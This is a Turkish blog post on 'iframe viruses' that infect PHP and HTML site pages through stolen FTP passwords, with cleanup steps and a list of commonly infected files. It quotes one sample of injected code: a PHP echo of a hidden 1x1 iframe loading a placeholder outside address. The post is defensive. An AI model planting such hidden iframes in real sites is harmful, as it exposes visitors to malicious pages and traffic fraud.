Sitenizin php ve html sayfalarına bulaşan frame ve iframe virüsleri nedir?
Nasıl çalışır ve iframe virüsü nasıl temizlenir?
Frame virüsü nedir?
Frame ve iFrame olarak tanımlanan bu virüs, FTP yolu ile sitenize bulaşan bir virüs türüdür. Amacı, sitenizin içinde genelde 1×1 pixel lik sayfa açarak, kendi websitesine hit ve rant kazandırmaktır.
Bazıları ise bu hit kazandırmanın yanısıra, bulaşmasını sağlamak için zararlı kod indirilmesini de sağlıyor.
Bir diğer Çeşitleri ise, iframe virüslerinin, sitenizin php ve html sayfalarına bulaşarak google ‘de sandbox a düşürmek / zararlı site olarak tanımlamak. Bu tarz durumlarda hem hit, hemde karizmanızı kaybedebiliyorsunuz.
Çünki, Virüs bulunan bir siteye kimse girmek istemez
Bir iFrame virüsü nasıl anlaşılır?
Bir php sayfasına bulaşan iframe virüsünün örnek kodu alttaki gibidir;
[note]echo “<iframe src=”http://siteadresi123″ width=1 height=1
style=”visibility:hidden;position:absolute”></iframe>”;[/note]
Bu koda teknik açıdan biraz göz atalım.
Kodda php nin echo formatı içinde iframe komutu ile bir sayfa açtırmak istiyor. Bu sayfanın konumlandırılmasında yatayda 1, dikeyde ise 1 pixel derinlik verilmiş.
Kodun çağrıldığı adreste üstte belirttiğim zararlı bir işlem bulunuyor olabilir.
iframe Virüsü Nasıl Temizlenir?
iFrame virüsleri genelde size FTP yolu ile bulaştı ise, tüm şifrelerinizi alır ve kayıt eder. Bu şifrelerinizi periyodik olarak bazı zamanlarda kontrol ederek FTP nize bağlanır. Eğer kodu sildiyseniz, zararlı yazılım ftp sifrenizi bildiginden tekrar girer ve virüs yazılırken tanımlanan php ve diğer sayfalara bulaşır. Bu demektir ki, kodu silmek yeterli değil.
Şimdi adımlar ile neler yapabileceğimize göz atalım…
- Bir FTP yazılımında Şifreniz Kayıtlı mı?
- Bilgisayarınızdaki virüsü temizlemelisiniz!
- Bir spyware taraması da fena olmazdı!
- Virüsü temizledik Şimdi Sırada Sitemizden temizlemek!
Tüm dosyaları bilgisayarınıza indirdikten sonra, HTML editörünüz ile açarak, içinde tırnaklar olmadan: “script”, “frame”, “iframe” gibi kelimeleri tek tek aratın. Eğer buldugunuz kod size ait olan bir iframe kodu değilse, zararlı kodu hemen silin!
Eğer birçok dosyaya sahipseniz, bu işlemi birçok HTML editörünün de desteklediği, “tüm sayfalarda bul” seçeneyi ile tüm açık dökümanlarda aratabilirsiniz. Dreamweaver CTRL+H komutu ile bu pencereye ulasip, “find all open files” kısmını işaretlerseniz, tüm dosyalarınızda bunları tek arama ile bulabilir / değiştirebilirsiniz.
- Genelde bulaştığı sayfalar:
- index.html
- index.php
- index.shtml
- index.htm
- footer.php
- header.php
- admin.php
- connect.php
- login.php
- logout.php
- contact.php
Hiç yorum yok:
Yorum Gönder
Computer - Internet Technology Design World -----------Bilim ve Teknik -----------internet,oyun,bilgisayar,bilişim,Programlama,Bilim Network,Msn,Yahoo,messenger,Gmail,Hotmail